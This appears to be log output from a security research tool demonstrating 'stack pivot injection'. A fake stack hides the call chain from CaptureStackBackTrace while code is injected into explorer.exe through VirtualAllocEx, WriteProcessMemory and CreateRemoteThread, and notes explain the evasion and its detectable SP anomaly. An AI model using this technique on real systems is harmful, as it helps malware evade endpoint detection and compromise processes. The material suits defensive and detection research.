================================================================================
  SCENARIO 4: STACK PIVOT INJECTION
================================================================================

[INFO] Preparing isolated execution environment
[INFO] Expected: 0 frames from CaptureStackBackTrace, SP outside TEB bounds
[SUCCESS] Allocated 64 KB isolated stack at 0x0000022C253A0000
[DEBUG] Selected gadget[18/512]: 0x00007FFE81EF35C0
[INFO] Fake frame configuration:
      FP: 0x0000022C253AFF00
      LR: 0x00007FFE81EF35C0
      SP: 0x0000022C253B0000  (outside TEB StackBase/StackLimit)

  [>] Executing concealed function: InjectExplorer
      Target: explorer.exe -- full injection pattern

  [STACK TRACE] From inside InjectExplorer (user-mode view):
      (no frames -- stack pivot active)
  [>] Found explorer.exe PID: 4872
  [>] OpenProcess handle: 0x0000000000000148
  [>] VirtualAllocEx RWX at: 0x00000000040C0000
  [>] WriteProcessMemory: 16 bytes written
  [>] CreateRemoteThread: TID handle 0x0000000000000144

  [>] Injection complete -- payload executed in explorer.exe

[SUCCESS] Stack pivot injection completed in 495 ms
[INFO] Stack isolation defeated user-mode stack walking
[DEBUG] Released isolated stack memory

Notes:
- CBT: 0 frames. CaptureStackBackTrace checks SP against TEB bounds before
  walking; SP = 0x0000022C253B0000 is outside [0x9c2fb000, 0x9c300000], so
  the walker aborts immediately. Fastest scenario (495 ms) because SymFromAddr
  is never called (0 frames to resolve).
- Fake stack: VirtualAlloc'd region 0x0000022C253A0000 (64 KB).
  FP = 0x0000022C253AFF00, LR = gadget (RtlpAllocateHeapInternal region).
- Residual signature: SP anomaly detectable by any tool that checks TEB bounds.
